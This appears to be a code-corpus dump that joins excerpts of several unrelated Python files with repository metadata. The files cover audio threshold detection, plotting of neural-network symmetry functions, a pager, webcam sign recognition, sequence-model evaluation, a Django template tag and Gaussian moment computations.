n = sample * SHORT_NORMALIZE
sum_squares += n * n
rms = math.pow(sum_squares / count, 0.5)
return rms * 1000
def __init__(self):
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
output=True,
frames_per_buffer=chunk)
self.sound_count = 0
def react(self):
self.sound_count += 1
print(f'Noise detected. Count: {self.sound_count}')
print("Listening for sound")
def listen(self):
print('Listening beginning')
while True:
input = self.stream.read(chunk)
rms_val = self.rms(input)
if rms_val > Threshold:
self.react()
a = Listener()
a.listen() | astuvan/av_generator | sound/react_to_sound/react_threshold.py | react_threshold.py | py | 1,392 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pyaudio.paInt16",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "struct.unpack",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "math.pow",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "pyaudio.PyAudio",
"li... |
35947581054 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
"""
This script is for plotting G1/G2/G4 data of calculated Symm-Func for
train and predict of Lammps-MD 1000K LC7
"""
def plotG(symdt, plttitle, plotfile, xlb, clr):
fig = plt.figure()
ax = fig.add_subplot(111)
plt.title(plttitle)
ax.set_ylabel("Value of G")
ax.grid(True)
num=0
for symdata in symdt:
for eachsample in symdata:
print(f'{num}: {plttitle}')
for gdata in eachsample:
ax.scatter(xlb, gdata, c=clr, marker='.')
num=num+1
labels = ax.get_xticklabels()
plt.setp(labels, rotation=90, fontsize=8);
plt.savefig(plotfile)
plt.close()
def gatherG(root, outfolder, grps, md):
xlb=["G1"]
clr=["b"]
for i in range(1, 25):
xlb.append("G2-"+str(i))
clr.append("g")
for i in range(1, 17):
xlb.append("G4-"+str(i))
clr.append("c")
for grp in grps:
symdtt, symdtp = [],[]
plotfileT=outfolder+grp+"-Gdata-T.png"
plotfileP=outfolder+grp+"-Gdata-P.png"
for i in range(1, 11):
if grp=='mix':
for j in range(1, 11):
datadir=root+grp+"/"+str(i)+"/"+str(j)
symfft=datadir+"/data/CrystalSi64/symmetry_function.npz"
symt= np.load(symfft)
symdata= symt['sym_func']
symdtt.append(symdata)
symffp=datadir+"/predict-phono3py-2/output-phono3py/symmetry_function-pred.npz"
symp= np.load(symffp)
symdata= symp['sym_func']
symdtp.append(symdata)
else:
datadir=root+grp+"/"+str(i)
symfft=datadir+"/data/CrystalSi64/symmetry_function.npz"
symt= np.load(symfft)
symdata= symt['sym_func']
symdtt.append(symdata)
symffp=datadir+"/predict-phono3py-2/output-phono3py/symmetry_function-pred.npz"
symp= np.load(symffp)
symdata= symp['sym_func']
symdtp.append(symdata)
print(f'Symm_func of {grp} is gathered')
stnparr=np.array(symdtt)
plttitle=f'[{md}/{grp}] Train({stnparr.shape}) Symm_Func G value'
plotG(symdtt, plttitle, plotfileT, xlb, clr)
spnparr=np.array(symdtp)
plttitle=f'[{md}/{grp}] Predict({spnparr.shape}) Symm_Func G value'
plotG(symdtp, plttitle, plotfileP, xlb, clr)
print(f'Symm_func of {grp} is plotted')
if __name__ == '__main__':
#Plot Lammps-MD LC7 Symm_Func of Train & Predict
root="/home/okugawa/HDNNP/Si-190808/1000K-LC7/"
outfolder="/home/okugawa/HDNNP/Si-190808/result-LC7/symf/"
grps=['0.95','0.97','0.99','1.00','1.01','1.03','1.05','mix']
gatherG(root, outfolder, grps, "Lammps-MD")
#Plot AIMD LC7 Symm_Func of Train & Predict
root="/home/okugawa/HDNNP/Si-190808-md/1000K-LC7n/"
outfolder="/home/okugawa/HDNNP/Si-190808-md/result-LC7n/symf/"
grps=['0.95','0.97','0.99','1.0','1.01','1.03','1.05','mix']
gatherG(root, outfolder, grps, "AIMD") | s-okugawa/HDNNP-tools | tools/Lmps-MD/plotSymF-TP2.py | plotSymF-TP2.py | py | 3,233 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "ma... |
35162208747 | import sys
import atexit
import subprocess
import typing
class AutoPager:
def __init__(self, no_pager: bool = False, always: bool = False):
self.original_stdout = sys.stdout
self.always = always
self.no_pager = no_pager
if self.original_stdout.isatty():
self.process: typing.Optional[
subprocess.Popen[str]] = subprocess.Popen(
['/usr/bin/less', '-F'],
stdin=subprocess.PIPE,
encoding='utf-8')
sys.stdout = self.process.stdin # type: ignore
else:
self.process = None
atexit.register(self.output)
def output(self):
if self.process:
self.process.communicate()
| informationsea/cromwell-helpers | cromwellhelper/pager.py | pager.py | py | 751 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.stdout",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "typing.Optional",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "subprocess.Popen",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "subprocess.... |
72503316195 | import cv2
import numpy as np
from keras.models import load_model
model = load_model('CNNmodel.h5')
def prediction(pred):
return chr(pred + 65)
def keras_predict(model1, image):
data = np.asarray(image, dtype="int32")
pred_probab = model1.predict(data)[0]
pred_class = list(pred_probab).index(max(pred_probab))
return max(pred_probab), pred_class
def keras_process_image(img):
img = cv2.resize(img, (1, 28, 28), interpolation=cv2.INTER_AREA)
return img
def crop_image(image, x, y, width, height):
return image[y:y + height, x:x + width]
def main():
while True:
webcam = cv2.VideoCapture(0)
rval, frame = webcam.read()
frame = cv2.flip(frame, 1)
im2 = crop_image(frame, 0, 300, 300, 300)
image_grayscale = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)
image_grayscale_blurred = cv2.GaussianBlur(image_grayscale, (15, 15), 0)
im3 = cv2.resize(image_grayscale_blurred, (28, 28), interpolation=cv2.INTER_AREA)
im4 = np.resize(im3, (28, 28, 1))
im5 = np.expand_dims(im4, axis=0)
pred_probab, pred_class = keras_predict(model, im5)
curr = prediction(pred_class)
cv2.putText(frame, curr, (10, 300), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)
cv2.rectangle(frame, (0, 300), (300, 600), (255, 255, 00), 3)
cv2.imshow("frame", frame)
cv2.imshow("Image3", image_grayscale_blurred)
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
if __name__ == '__main__':
main()
# cam_capture.release()
cv2.destroyAllWindows()
| CharizmaticWizard/Sign-Language-Detection | capture.py | capture.py | py | 1,644 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "keras.models.load_model",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "cv2.INTER_AREA",
... |
70205308194 | from dp import *
import pickle
from collections import defaultdict
from most_probable_sequence import most_probable_sequence
from utils import get_data
from rich import print
def load_weights(run_name, weights_root):
if run_name != None:
w = np.load(f"outputs/{run_name}/w.npy")
b = np.load(f"outputs/{run_name}/b.npy")
else:
w = np.load(f"{weights_root}/w.npy")
b = np.load(f"{weights_root}/b.npy")
return w, b
def evaluate_map(features, y_true, weights_root, d=defaultdict(list)):
w, b = load_weights(None, weights_root)
rvces = []
for features_i, y_true_i in zip(features, y_true):
features_i = features_i[::2]
scores = w @ features_i.T + b.reshape(-1, 1)
y_pred = scores.argmax(0)
rvce = abs(y_pred.sum() - y_true_i.sum()) / y_true_i.sum()
rvces.append(rvce)
# print('rvce:', rvce, ' | c_pred:', y_pred.sum(), ' | c_true:', y_true_i.sum())
y_t = y_true_i[::2] + y_true_i[1::2]
assert len(y_t) == len(y_pred)
for p, t in zip(y_pred, y_t):
d[t].append(p)
print("MAP")
print(f"{np.mean(rvces):.3f} ± {np.std(rvces):.3f}")
print()
return rvces
def evaluate(
features,
y_true,
weights_root,
run_name=None,
d=defaultdict(list),
predictions=defaultdict(list),
):
w, b = load_weights(run_name, weights_root)
Y = 6
w = w[: 2 * Y]
b = b[: 2 * Y]
losses = []
rvces = []
for i, (features_i, y_true_i) in enumerate(zip(features, y_true)):
f = calc_f(features_i, w, b)
length, y_pred = most_probable_sequence(f)
predictions[i].append(y_pred)
rvce = abs(y_pred.sum() - y_true_i.sum()) / y_true_i.sum()
rvces.append(rvce)
y_p = y_pred[::2] + y_pred[1::2]
y_t = y_true_i[::2] + y_true_i[1::2]
for p, t in zip(y_p, y_t):
d[t].append(p)
print("Structured")
print(run_name if run_name != None else "initial")
print(f"{np.mean(rvces):.3f} ± {np.std(rvces):.3f}")
print()
return rvces
def plot(d, d_map):
fig, axes = plt.subplots(1, 2, figsize=(12, 5))
X = []
Y = []
Y_map = []
distribution = []
d = {k: d[k] for k in sorted(d)}
for label, preds in d.items():
X.append(label)
Y.append(np.mean(preds))
preds_map = d_map[label]
Y_map.append(np.mean(preds_map) if len(preds_map) > 0 else 0)
distribution.append(len(preds))
axes[0].set_xlabel("True class")
axes[0].set_ylabel("Average Predicted class")
axes[0].plot(X, Y, "o-", label="structured")
axes[0].plot(X, Y_map, "o-", label="MAP")
axes[0].plot(range(len(X)), "o-", label="true")
axes[0].grid()
axes[0].legend()
axes[1].set_xlabel("Class")
axes[1].set_ylabel("Number of events")
axes[1].grid()
axes[1].plot(distribution, "o-")
plt.tight_layout()
plt.savefig("outputs/bmrm_true_vs_pred_class.png")
if __name__ == "__main__":
normalize_X = False
# ''' old
runs = [
"divine-darkness-365", # split_0
"elated-lake-399", # split_1
"peach-oath-408", # split_2
"fresh-durian-435", # split_3
"peach-armadillo-462", # split_4
]
# '''
""" 031_RX100_resized_128_sr_22050
# trained on:
# - files/031_RX100_resized_128_sr_22050/trn/split_*/shuffled/whole_file
runs = [
'solar-wind-634', # split_0
'floral-gorge-654', # split_1
'restful-glitter-698', # split_2
'noble-firefly-711', # split_3
'leafy-music-763' # split_4
]
# """
""" 035_RX100_resized_128_audio_image_augmentation_bs_256
runs = [
'glad-terrain-496', # split_0
'noble-waterfall-518', # split_1
'sage-dragon-541', # split_2
'eternal-cloud-563', # split_3
'dry-wildflower-574' # split_4
]
# """
""" 031_RX100_resized_128_sr_22050
# trained on:
# - "files/031_RX100_resized_128_sr_22050/trn/split_*/shuffled/10_minutes/5_samples"
# - "files/031_RX100_resized_128_sr_22050/trn/split_*/shuffled/whole_file"
runs = [
'honest-paper-1025',
'frosty-moon-1035',
'magic-silence-1076',
'graceful-eon-1089',
'laced-elevator-1111'
]
# """
""" 031_RX100_resized_128_sr_22050
# trained on:
# - "files/031_RX100_resized_128_sr_22050/trn/split_*/shuffled/10_minutes/5_samples"
runs = [
'silver-disco-893',
'gentle-surf-922',
'ruby-jazz-944',
'resilient-wind-963',
'twilight-waterfall-1008'
]
# """
""" 031_RX100_resized_128_sr_22050
# 031_RX100_resized_128_sr_22050
# trained on:
# - "files/031_more_validation_samples/trn/split_4/shuffled/whole_file"
runs = [
'different-sunset-1159',
'swift-tree-1198',
'likely-sky-1224',
'sage-glitter-1231',
'young-sea-1259'
]
# """
""" 031_more_validation_samples
# trained on:
# - "files/031_more_validation_samples/trn/split_4/shuffled/whole_file"
runs = [
'vital-wood-1302',
'treasured-bird-1305',
'genial-grass-1313',
'still-voice-1315',
'astral-deluge-1322'
]
# """
""" BMRM
runs = [
'dauntless-microwave-39',
'fallen-breeze-39',
'driven-eon-41',
'leafy-sun-43',
'vocal-dew-41'
]
# """
""" BMRM with normalized X
runs = [
'devout-waterfall-84',
'kind-rain-88',
'laced-sun-86',
'serene-forest-87',
'fallen-dream-84'
]
normalize_X = True
# """
""" BMRM only biases
runs = [
'solar-field-203',
'pretty-lion-203',
'solar-shadow-203',
'fast-morning-203',
'happy-feather-207'
]
# """
tst_files_root = 'files/031_RX100_resized_128_sr_22050'
# BMRM files/036
runs = [
'zesty-oath-246',
'elated-pond-244',
'golden-flower-247',
'dauntless-wildflower-245',
'toasty-frog-248'
]
tst_files_root = 'files/036'
d_map = defaultdict(list)
d = defaultdict(list)
rvces = []
rvces_map = []
for split, run_name in enumerate(runs):
print("-" * 10)
print(f"Split: {split} Run: {run_name}\n")
Y, X = get_data(
f"{tst_files_root}/tst/split_{split}/shuffled/whole_file",
normalize_X=normalize_X,
)
weights_root = f"{tst_files_root}/params/split_{split}"
# evaluate using MAP inference
rvces_run_map = evaluate_map(X, Y, weights_root, d_map)
rvces_map.extend(rvces_run_map)
# evaluate using most probable sequence (not trained)
evaluate(X, Y, weights_root)
# evaluate using most probable sequence (trained)
rvces_run = evaluate(X, Y, weights_root, run_name, d)
rvces.extend(rvces_run)
rvces = np.array(rvces)
print("-" * 10)
print("Final")
print(f"STRUCTURED = {np.mean(rvces):.3f} ± {np.std(rvces):.3f}")
print(f"MAP = {np.mean(rvces_map):.3f} ± {np.std(rvces_map):.3f}")
print()
plot(d, d_map)
| yermandy/most-probable-sequence | inference.py | inference.py | py | 7,238 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.defaultdict",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "rich.print",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "rich.print",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "rich.print",
"line_... |
33286894157 | import sys
sys.path.insert(0, "../SymJAX")
from scipy.stats import kde, multivariate_normal
import cdd
import numpy as np
import itertools
from scipy.spatial import ConvexHull, Delaunay
from scipy.special import softmax
from numpy.linalg import lstsq
from tqdm import tqdm
import symjax as sj
import symjax.tensor as T
from multiprocessing import Pool, Array
import networks
VERBOSE = 0
def create_fns(input, in_signs, Ds, x, m0, m1, m2, batch_in_signs, alpha=0.1,
sigma=1, sigma_x=1, lr=0.0002):
cumulative_units = np.concatenate([[0], np.cumsum(Ds[:-1])])
BS = batch_in_signs.shape[0]
Ws = [T.Variable(sj.initializers.glorot((j, i)) * sigma)
for j, i in zip(Ds[1:], Ds[:-1])]
bs = [T.Variable(sj.initializers.he((j,)) * sigma) for j in Ds[1:-1]]\
+ [T.Variable(T.zeros((Ds[-1],)))]
A_w = [T.eye(Ds[0])]
B_w = [T.zeros(Ds[0])]
A_q = [T.eye(Ds[0])]
B_q = [T.zeros(Ds[0])]
batch_A_q = [T.eye(Ds[0]) * T.ones((BS, 1, 1))]
batch_B_q = [T.zeros((BS, Ds[0]))]
maps = [input]
signs = []
masks = [T.ones(Ds[0])]
in_masks = T.where(T.concatenate([T.ones(Ds[0]), in_signs]) > 0, 1., alpha)
batch_in_masks = T.where(T.concatenate([T.ones((BS, Ds[0])),
batch_in_signs], 1) > 0, 1., alpha)
for w, b in zip(Ws[:-1], bs[:-1]):
pre_activation = T.matmul(w, maps[-1]) + b
signs.append(T.sign(pre_activation))
masks.append(T.where(pre_activation > 0, 1., alpha))
maps.append(pre_activation * masks[-1])
maps.append(T.matmul(Ws[-1], maps[-1]) + bs[-1])
# compute per region A and B
for start, end, w, b, m in zip(cumulative_units[:-1],
cumulative_units[1:], Ws, bs, masks):
A_w.append(T.matmul(w * m, A_w[-1]))
B_w.append(T.matmul(w * m, B_w[-1]) + b)
A_q.append(T.matmul(w * in_masks[start:end], A_q[-1]))
B_q.append(T.matmul(w * in_masks[start:end], B_q[-1]) + b)
batch_A_q.append(T.matmul(w * batch_in_masks[:, None, start:end],
batch_A_q[-1]))
batch_B_q.append((w * batch_in_masks[:, None, start:end]\
* batch_B_q[-1][:, None, :]).sum(2) + b)
batch_B_q = batch_B_q[-1]
batch_A_q = batch_A_q[-1]
signs = T.concatenate(signs)
inequalities = T.hstack([T.concatenate(B_w[1:-1])[:, None],
T.vstack(A_w[1:-1])]) * signs[:, None]
inequalities_code = T.hstack([T.concatenate(B_q[1:-1])[:, None],
T.vstack(A_q[1:-1])]) * in_signs[:, None]
#### loss
log_sigma2 = T.Variable(sigma_x)
sigma2 = T.exp(log_sigma2)
Am1 = T.einsum('qds,nqs->nqd', batch_A_q, m1)
Bm0 = T.einsum('qd,nq->nd', batch_B_q, m0)
B2m0 = T.einsum('nq,qd->n', m0, batch_B_q**2)
AAm2 = T.einsum('qds,qdu,nqup->nsp', batch_A_q, batch_A_q, m2)
inner = - (x * (Am1.sum(1) + Bm0)).sum(1) + (Am1 * batch_B_q).sum((1, 2))
loss_2 = (x ** 2).sum(1) + B2m0 + T.trace(AAm2, axis1=1, axis2=2).squeeze()
loss_z = T.trace(m2.sum(1), axis1=1, axis2=2).squeeze()
cst = 0.5 * (Ds[0] + Ds[-1]) * T.log(2 * np.pi)
loss = cst + 0.5 * Ds[-1] * log_sigma2 + inner / sigma2\
+ 0.5 * loss_2 / sigma2 + 0.5 * loss_z
mean_loss = loss.mean()
adam = sj.optimizers.NesterovMomentum(mean_loss, Ws + bs, lr, 0.9)
train_f = sj.function(batch_in_signs, x, m0, m1, m2, outputs=mean_loss, updates=adam.updates)
f = sj.function(input, outputs=[maps[-1], A_w[-1], B_w[-1],
inequalities, signs])
g = sj.function(in_signs, outputs=[A_q[-1], B_q[-1]])
all_g = sj.function(in_signs, outputs=inequalities_code)
h = sj.function(input, outputs=maps[-1])
return f, g, h, all_g, train_f, sigma2
def lse(x, axis):
x_max = x.max(axis=axis)
return np.log(np.sum(np.exp(x - x_max[:, None]), axis=axis)) + x_max
def find_region(z, regions, input2sign):
x_signs = np.array([input2sign(zz.reshape((-1,))) for zz in z])
signs = np.array(list(regions.keys()))
return np.equal(x_signs[:, None, :], signs).all(2).argmax(1)
def in_region(z, ineq):
"""
z is shape (N, S) or (S)
ineq is shape (K, S+1)
"""
if z.ndim > 1:
if ineq is None:
return np.ones(z.shape[0], dtype='bool')
zp = np.hstack([np.ones((z.shape[0], 1)), z])
return (np.einsum('ks,ns->nk', ineq, zp) >= 0).all(axis=1)
else:
if ineq is None:
return True
return (ineq.dot(np.hstack([np.ones(1), z])) >= 0).all()
def get_simplices(vertices):
"""compute the simplices from a convex polytope given in its
V-representation
vertices: array of shape (V, D) with V the number of vertices
"""
if vertices.shape[1] == 1:
assert vertices.shape[0] == 2
return [[0, 1]]
return Delaunay(vertices).simplices
def flip(A, i):
sign = 1 - 2 * (np.arange(len(A)) == i).astype('float32')
if A.ndim == 2:
sign = sign[:, None]
return A * sign
def reduce_ineq(ineqs):
norms = set(np.nonzero(np.linalg.norm(ineqs, 2, 1) < 1e-8)[0])
M = cdd.Matrix(ineqs)
M.rep_type = cdd.RepType.INEQUALITY
I = list(set(range(len(ineqs))) - norms - set(M.canonicalize()[1]))
return I
def find_neighbours(signs2ineq, signs):
ineq = signs2ineq(np.array(signs))
I = reduce_ineq(ineq)
# create the sign switching table
F = np.ones((len(I), len(signs)))
F[np.arange(len(I)), I] = - 1
return F * signs
def search_region(signs2ineq, signs2Ab, signs, max_depth=9999999999999):
S = dict()
# init
all_signs = []
# init the to_visit
to_visit=[list(signs)]
# search all the regions (their signs)
while True:
all_signs += to_visit
to_visit_after = []
for s in to_visit:
neighbours = find_neighbours(signs2ineq, s)
for n in neighbours:
a = np.any([np.array_equal(n,p) for p in to_visit_after])
b = np.any([np.array_equal(n,p) for p in to_visit])
c = np.any([np.array_equal(n,p) for p in all_signs])
if not (a + b + c):
to_visit_after.append(n)
if len(to_visit_after) == 0:
break
to_visit = to_visit_after
# not set up S
for s in all_signs:
ineq = signs2ineq(s)
S[tuple(s)] = {'ineq': ineq[reduce_ineq(ineq)], 'Ab': signs2Ab(s)}
return S
def get_vertices(inequalities):
# create the matrix the inequalities are a matrix of the form
# [b, -A] from b-Ax>=0
m = cdd.Matrix(inequalities)
m.rep_type = cdd.RepType.INEQUALITY
return cdd.Polyhedron(m).get_generators()
def mvstdnormcdf(lower, cov):
"""integrate a multivariate gaussian on rectangular domain
Parameters
----------
lower: array
the lower bound of the rectangular region, vector of length d
upper: array
the upper bound of the rectangular region, vector of length d
mu: array
the average of the multivariate gaussian, vector of length d
cov: array
the covariance matrix, matrix of shape (d, d)
"""
n = len(lower)
if n == 1:
return 1 - multivariate_normal.cdf(lower, cov=cov)
upper = [np.inf] * n
lowinf = np.isneginf(lower)
uppinf = np.isposinf(upper)
infin = 2.0 * np.ones(n)
np.putmask(infin,lowinf,0)
np.putmask(infin,uppinf,1)
np.putmask(infin, lowinf*uppinf, -1)
correl = cov[np.tril_indices(n, -1)]
options = {'abseps': 1e-20, 'maxpts': 6000 * n}
error, cdfvalue, inform = kde.mvn.mvndst(lower, upper, infin, correl,
**options)
if inform:
print('something wrong', inform, error)
return cdfvalue
def mu_u_sigma_u(low, cov, u):
D = len(cov)
if np.isscalar(u):
keeping = np.arange(D) != u
else:
keeping = (np.arange(D) != u[0]) * (np.arange(D) != u[1])
cov_no_u = cov[keeping][:, u]
cov_u = cov[keeping][:, keeping]
if np.isscalar(u):
cov_ = cov_u - np.outer(cov_no_u, cov_no_u) / cov_u
mu_ = cov_no_u * low[u] / cov_u
else:
inv_cov_u = np.linalg.inv(cov_u)
cov_ = cov_u - cov_no_u.dot(inv_cov_u.dot(cov_no_u.T))
mu_ = cov_no_u.dot(inv_cov_u.dot(low[u]))
return mu_, cov_, low[keeping]
def get_F_G(lower, cov):
"""compute the moment 1 given a set of planes inequality
smaller of equal to d
"""
D = len(lower)
f = np.zeros(D)
g = np.zeros((D, D))
for k in range(len(lower)):
if lower[k] == - np.inf:
continue
f[k] = multivariate_normal.pdf(lower[k], cov=cov[k, k])
if len(cov) > 1:
mu_u, cov_u, low_no_u = mu_u_sigma_u(lower, cov, k)
f[k] *= mvstdnormcdf(low_no_u - mu_u, cov_u)
for q in range(len(lower)):
if q == k or len(lower) <= 2 or lower[q] == - np.inf:
continue
u = [k, q]
g[k, q] = multivariate_normal.pdf(lower[u], cov=cov[u][:, u])
if len(cov) > 2:
mu_u, cov_u, low_no_u = mu_u_sigma_u(lower, cov, u)
g[k, q] *= mvstdnormcdf(low_no_u - mu_u, cov_u)
return f, g
def create_H(M):
K, D = M.shape
A = np.copy(M)
for i in range(D - K):
A, b = np.vstack((A, np.ones((1, D)))), np.zeros(K + 1 + i)
b[-1] = 1
vec = lstsq(A, b, rcond=-1)[0]
A[-1] = vec / np.linalg.norm(vec, 2)
return A[K:]
def cones_to_rectangle(ineqs, cov):
# first the general case without constraints
if ineqs is None:
lower = np.array([-np.inf] * len(cov))
return lower, np.eye(len(lower))
ineqs /= np.linalg.norm(ineqs[:, 1:], 2, 1, keepdims=True)
A, b = ineqs[:, 1:], - ineqs[:, 0]
D = A.shape[1] - A.shape[0]
if D == 0:
R = A
else:
R = np.vstack([A, create_H(A)])
R = np.vstack([A, create_H(A).dot(np.linalg.inv(cov))])
return np.concatenate([b, np.array([-np.inf] * D)]), R
def simplex_to_cones(vertices):
S = vertices.shape[1]
m = cdd.Matrix(np.hstack([np.ones((vertices.shape[0], 1)), vertices]))
m.rep_type = cdd.RepType.GENERATOR
v = np.array(cdd.Polyhedron(m).get_inequalities())
subsets = set()
values = set(range(v.shape[0]))
for n in range(1, v.shape[0]):
subsets = subsets.union(set(itertools.combinations(values, n)))
signs = [(-1)**S] + [(-1)**(len(J) + S) for J in subsets]
sets = [None] + [v[list(indices)] for indices in subsets]
return sets, signs
#######################################################
#
#
# MU, SIGMA
#
#######################################################
def mu_sigma(x, A, b, cov_z, cov_x):
"""takes a matrix of data x, all the region A and b and the cov x and x
returns n covariance matrices and N x n bias vectors
"""
inv_cov_x = np.linalg.inv(cov_x) if A.shape[1] > 1 else 1/cov_x
inv_cov_z = np.linalg.inv(cov_z) if A.shape[2] > 1 else 1/cov_z
inv_cov_w = inv_cov_z + np.einsum('nds,dk,nkz->nsz',A, inv_cov_x, A)
cov_w = np.linalg.inv(inv_cov_w) if A.shape[2] > 1 else 1/inv_cov_w
mu_w = np.einsum('nsk,Nnk->Nns', cov_w, np.einsum('nds,dk,Nnk->Nns',
A, inv_cov_x, x[:, None, :] - b))
return mu_w, cov_w
####################################################
#
# PHIS
#
####################################################
def phis_w(ineq_w, mu, cov_w):
# instead of integrating a non centered gaussian on w
# we integrate a centered Gaussian on w-mu. This is equivalent to
# adding mu to the bias of the inequality system
ineqs = ineq_w + 0.
ineqs[:, 0] += ineqs[:, 1:].dot(mu)
# we initialize the accumulators
phi0, phi1, phi2 = 0., 0., 0.
print(ineqs / np.linalg.norm(ineqs[:, 1:], 2, 1, keepdims=True))
if ineqs.shape[0] <= ineqs.shape[1] - 1:
simplices = [range(len(ineqs))]
else:
v = np.array(get_vertices(ineqs))[:, 1:]
print(v)
simplices = get_simplices(v)
for simplex in simplices:
cones = [(ineqs, 1)] if ineqs.shape[0] <= ineqs.shape[1] - 1 else zip(*simplex_to_cones(v[simplex]))
for ineqs_c, s in cones:
l_c, R_c = cones_to_rectangle(ineqs_c, cov_w)
cov_c = R_c.dot(cov_w.dot(R_c.T))
f, G = get_F_G(l_c, cov_c)
phi0 += s * mvstdnormcdf(l_c, cov_c)
phi1 += s * R_c.T.dot(f) # THIS SHOULD BE CHANGED BELOW FOR S>1
H = np.diag(np.nan_to_num(l_c) * f / np.diag(cov_c))############ - (cov_c * G).sum(1)) / np.diag(cov_c))
phi2 += s * R_c.T.dot(H.dot(R_c))
phi1 = cov_w.dot(phi1)
phi2 = (cov_w + np.outer(mu, mu))* phi0 + cov_w.dot(phi2.dot(cov_w))\
+ np.outer(mu, phi1) + np.outer(phi1, mu)
phi1 += mu * phi0
return phi0, phi1, phi2
def phis_all(ineqs, mu_all, cov_all):
phi0 = np.zeros(len(ineqs))
phi1 = np.zeros((len(ineqs), cov_all.shape[-1]))
phi2 = np.zeros(phi1.shape + (cov_all.shape[-1],))
for i, (ineq, mu, cov) in enumerate(zip(ineqs, mu_all, cov_all)):
phi0[i], phi1[i], phi2[i] = phis_w(ineq, mu, cov)
return phi0, phi1, phi2
############################# kappa computations
def log_kappa(x, cov_x, cov_z, A, b):
cov = cov_x + np.einsum('nds,sp,nkp->ndk',A, cov_z, A)
kappas = np.array([multivariate_normal.logpdf(x, mean=m, cov=c)
for m, c in zip(b, cov)])
if x.shape[0] == 1:
return kappas[None, :]
return kappas.T
##################################
def posterior(z, regions, x, As, Bs, cov_z, cov_x, input2signs):
mu, cov = mu_sigma(x, As, Bs, cov_z, cov_x)
kappas = np.exp(log_kappa(x, cov_x, cov_z, As, Bs))[0]
phis0 = phis_all([regions[r]['ineq'] for r in regions], mu[0], cov)[0]
indices = find_region(z, regions, input2signs)
output = np.zeros(len(indices))
for k in np.unique(indices):
w = indices == k
output[w] = multivariate_normal.pdf(z[w], mean=mu[0, k], cov=cov[k])
output *= kappas[indices] / (kappas * phis0).sum()
return output
############################## ALGO 2
def marginal_moments(x, regions, cov_x, cov_z):
# find all regions of the DN
As = np.array([regions[s]['Ab'][0] for s in regions])
Bs = np.array([regions[s]['Ab'][1] for s in regions])
# find all mus and cov (cov is constant per x, not mus)
mus, covs = mu_sigma(x, As, Bs, cov_z, cov_x) #(N n D) (n D D)
log_kappas = log_kappa(x, cov_x, cov_z, As, Bs) #(N n)
ineqs = np.array([regions[r]['ineq'] for r in regions])
P0, P1, P2 = [], [], []
for mu in tqdm(mus, desc='Computing PHIS'):
p0, p1, p2 = phis_all(ineqs, mu, covs)
P0.append(p0)
P1.append(p1)
P2.append(p2)
phis = [np.array(P0), np.array(P1), np.array(P2)]
phis[0] = np.maximum(phis[0], 1e-30)
phis[2] = np.maximum(phis[2], 1e-30 * np.eye(len(cov_z)))
# compute marginal
px = np.exp(lse(log_kappas + np.log(phis[0]), axis=1)) # (N)
# compute per region moments
print(mus.shape, log_kappas.shape)
alphas = np.exp(log_kappas - log_kappas.max(1, keepdims=True))\
/ (np.exp(log_kappas - log_kappas.max(1, keepdims=True)) * phis[0]).sum(1, keepdims=True)
m0_w = phis[0] * alphas
m1_w = phis[1] * alphas[:, :, None]
m2_w = phis[2] * alphas[:, :, None, None]
return px, m0_w, m1_w, m2_w
| RandallBalestriero/EMDGN | utils_old.py | utils_old.py | py | 15,737 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "sys.path.insert",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "numpy.concatenate",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "numpy.cumsum",
"lin... |
40829037969 | from base64 import b64encode
from django import template
CSS_CLASS = 'dj-special-block'
KEY_PREFIX = 'dj-special-{}'
block_count = 0
register = template.Library()
class ShideNode(template.Node):
template = "<div class=\"%s\" id=\"{key_name}\"></div>"\
"<script>localStorage.setItem('{key_name}', '{data}');</script>" % CSS_CLASS
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
output = self.nodelist.render(context)
prepared_output = self.template.format(
key_name=KEY_PREFIX.format(block_count), data=b64encode(output))
block_count += 1
return prepared_output
def do_shide(parser, token):
nodelist = parser.parse(('endshide',))
parser.delete_first_token()
return ShideNode(nodelist)
@register.simple_tag
def post_shide():
""" This is just minified version of repo root file unhide.js
"""
return """<script>(function(){'use strict';let $blocks=document.querySelectorAll('.{css_name}');$blocks.forEach(function($oneBlock){$oneBlock.innerHTML=window.atob(localStorage.getItem($oneBlock.getAttribute('id')))})})();</script>""".format(css_name=CSS_CLASS)
| xfenix/django-search-hide | searchhide/templatetags/searchhide.py | searchhide.py | py | 1,199 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.template.Library",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.template",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.template.Node",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "djang... |
38975372598 | import shell_content
import os
import time
import signal
import subprocess
import numpy as np
import pydoop.hdfs as hdfs
import json
